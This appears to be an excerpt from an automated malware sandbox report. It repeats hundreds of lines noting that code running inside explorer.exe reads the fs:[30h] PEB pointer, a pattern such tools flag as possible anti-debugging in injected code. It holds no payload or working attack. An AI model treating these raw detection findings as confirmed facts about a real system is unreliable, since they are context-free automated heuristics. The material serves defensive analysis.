Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048258EC mov eax, dword ptr fs:[00000030h] 5_2_048258EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E14FB mov eax, dword ptr fs:[00000030h] 5_2_048E14FB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048A6CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6C0A mov eax, dword ptr fs:[00000030h] 5_2_048A6C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F740D mov eax, dword ptr fs:[00000030h] 5_2_048F740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1C06 mov eax, dword ptr fs:[00000030h] 5_2_048E1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F4015 mov eax, dword ptr fs:[00000030h] 5_2_048F4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F4015 mov eax, dword ptr fs:[00000030h] 5_2_048F4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7016 mov eax, dword ptr fs:[00000030h] 5_2_048A7016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485002D mov eax, dword ptr fs:[00000030h] 5_2_0485002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B02A mov eax, dword ptr fs:[00000030h] 5_2_0483B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485BC2C mov eax, dword ptr fs:[00000030h] 5_2_0485BC2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A44B mov eax, dword ptr fs:[00000030h] 5_2_0485A44B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04840050 mov eax, dword ptr fs:[00000030h] 5_2_04840050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04840050 mov eax, dword ptr fs:[00000030h] 5_2_04840050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BC450 mov eax, dword ptr fs:[00000030h] 5_2_048BC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BC450 mov eax, dword ptr fs:[00000030h] 5_2_048BC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484746D mov eax, dword ptr fs:[00000030h] 5_2_0484746D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1074 mov eax, dword ptr fs:[00000030h] 5_2_048F1074
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E2073 mov eax, dword ptr fs:[00000030h] 5_2_048E2073
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A185 mov eax, dword ptr fs:[00000030h] 5_2_0485A185
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 mov eax, dword ptr fs:[00000030h] 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C182 mov eax, dword ptr fs:[00000030h] 5_2_0484C182
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04822D8A mov eax, dword ptr fs:[00000030h] 5_2_04822D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852990 mov eax, dword ptr fs:[00000030h] 5_2_04852990
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FD9B mov eax, dword ptr fs:[00000030h] 5_2_0485FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FD9B mov eax, dword ptr fs:[00000030h] 5_2_0485FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F05AC mov eax, dword ptr fs:[00000030h] 5_2_048F05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F05AC mov eax, dword ptr fs:[00000030h] 5_2_048F05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048535A1 mov eax, dword ptr fs:[00000030h] 5_2_048535A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048561A0 mov eax, dword ptr fs:[00000030h] 5_2_048561A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048561A0 mov eax, dword ptr fs:[00000030h] 5_2_048561A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A69A6 mov eax, dword ptr fs:[00000030h] 5_2_048A69A6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04851DB5 mov eax, dword ptr fs:[00000030h] 5_2_04851DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A51BE mov eax, dword ptr fs:[00000030h] 5_2_048A51BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov ecx, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048A6DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0482B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048B41E8 mov eax, dword ptr fs:[00000030h] 5_2_048B41E8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 5_2_048EFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048D8DF1 mov eax, dword ptr fs:[00000030h] 5_2_048D8DF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829100 mov eax, dword ptr fs:[00000030h] 5_2_04829100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov eax, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 mov ecx, dword ptr fs:[00000030h] 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AD30 mov eax, dword ptr fs:[00000030h] 5_2_0482AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04833D34 mov eax, dword ptr fs:[00000030h] 5_2_04833D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EE539 mov eax, dword ptr fs:[00000030h] 5_2_048EE539
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8D34 mov eax, dword ptr fs:[00000030h] 5_2_048F8D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048AA537 mov eax, dword ptr fs:[00000030h] 5_2_048AA537
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854D3B mov eax, dword ptr fs:[00000030h] 5_2_04854D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485513A mov eax, dword ptr fs:[00000030h] 5_2_0485513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485513A mov eax, dword ptr fs:[00000030h] 5_2_0485513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484B944 mov eax, dword ptr fs:[00000030h] 5_2_0484B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484B944 mov eax, dword ptr fs:[00000030h] 5_2_0484B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04863D43 mov eax, dword ptr fs:[00000030h] 5_2_04863D43
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3540 mov eax, dword ptr fs:[00000030h] 5_2_048A3540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04847D50 mov eax, dword ptr fs:[00000030h] 5_2_04847D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C962 mov eax, dword ptr fs:[00000030h] 5_2_0482C962
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B171 mov eax, dword ptr fs:[00000030h] 5_2_0482B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482B171 mov eax, dword ptr fs:[00000030h] 5_2_0482B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C577 mov eax, dword ptr fs:[00000030h] 5_2_0484C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484C577 mov eax, dword ptr fs:[00000030h] 5_2_0484C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BFE87 mov eax, dword ptr fs:[00000030h] 5_2_048BFE87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485D294 mov eax, dword ptr fs:[00000030h] 5_2_0485D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485D294 mov eax, dword ptr fs:[00000030h] 5_2_0485D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048252A5 mov eax, dword ptr fs:[00000030h] 5_2_048252A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 5_2_048F0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A46A7 mov eax, dword ptr fs:[00000030h] 5_2_048A46A7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0483AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0483AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485FAB0 mov eax, dword ptr fs:[00000030h] 5_2_0485FAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04868EC7 mov eax, dword ptr fs:[00000030h] 5_2_04868EC7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048536CC mov eax, dword ptr fs:[00000030h] 5_2_048536CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DFEC0 mov eax, dword ptr fs:[00000030h] 5_2_048DFEC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852ACB mov eax, dword ptr fs:[00000030h] 5_2_04852ACB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8ED6 mov eax, dword ptr fs:[00000030h] 5_2_048F8ED6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048376E2 mov eax, dword ptr fs:[00000030h] 5_2_048376E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852AE4 mov eax, dword ptr fs:[00000030h] 5_2_04852AE4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048516E0 mov ecx, dword ptr fs:[00000030h] 5_2_048516E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482C600 mov eax, dword ptr fs:[00000030h] 5_2_0482C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04858E00 mov eax, dword ptr fs:[00000030h] 5_2_04858E00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1608 mov eax, dword ptr fs:[00000030h] 5_2_048E1608
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04838A0A mov eax, dword ptr fs:[00000030h] 5_2_04838A0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov ecx, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04825210 mov eax, dword ptr fs:[00000030h] 5_2_04825210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AA16 mov eax, dword ptr fs:[00000030h] 5_2_0482AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482AA16 mov eax, dword ptr fs:[00000030h] 5_2_0482AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04843A1C mov eax, dword ptr fs:[00000030h] 5_2_04843A1C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A61C mov eax, dword ptr fs:[00000030h] 5_2_0485A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485A61C mov eax, dword ptr fs:[00000030h] 5_2_0485A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482E620 mov eax, dword ptr fs:[00000030h] 5_2_0482E620
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04864A2C mov eax, dword ptr fs:[00000030h] 5_2_04864A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04864A2C mov eax, dword ptr fs:[00000030h] 5_2_04864A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DFE3F mov eax, dword ptr fs:[00000030h] 5_2_048DFE3F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829240 mov eax, dword ptr fs:[00000030h] 5_2_04829240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04837E41 mov eax, dword ptr fs:[00000030h] 5_2_04837E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EAE44 mov eax, dword ptr fs:[00000030h] 5_2_048EAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EAE44 mov eax, dword ptr fs:[00000030h] 5_2_048EAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EEA55 mov eax, dword ptr fs:[00000030h] 5_2_048EEA55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048B4257 mov eax, dword ptr fs:[00000030h] 5_2_048B4257
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DB260 mov eax, dword ptr fs:[00000030h] 5_2_048DB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DB260 mov eax, dword ptr fs:[00000030h] 5_2_048DB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8A62 mov eax, dword ptr fs:[00000030h] 5_2_048F8A62
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483766D mov eax, dword ptr fs:[00000030h] 5_2_0483766D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0484AE73 mov eax, dword ptr fs:[00000030h] 5_2_0484AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486927A mov eax, dword ptr fs:[00000030h] 5_2_0486927A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E138A mov eax, dword ptr fs:[00000030h] 5_2_048E138A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04831B8F mov eax, dword ptr fs:[00000030h] 5_2_04831B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04831B8F mov eax, dword ptr fs:[00000030h] 5_2_04831B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048DD380 mov ecx, dword ptr fs:[00000030h] 5_2_048DD380
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852397 mov eax, dword ptr fs:[00000030h] 5_2_04852397
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485B390 mov eax, dword ptr fs:[00000030h] 5_2_0485B390
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04838794 mov eax, dword ptr fs:[00000030h] 5_2_04838794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A7794 mov eax, dword ptr fs:[00000030h] 5_2_048A7794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04854BAD mov eax, dword ptr fs:[00000030h] 5_2_04854BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F5BA5 mov eax, dword ptr fs:[00000030h] 5_2_048F5BA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A53CA mov eax, dword ptr fs:[00000030h] 5_2_048A53CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A53CA mov eax, dword ptr fs:[00000030h] 5_2_048A53CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048503E2 mov eax, dword ptr fs:[00000030h] 5_2_048503E2
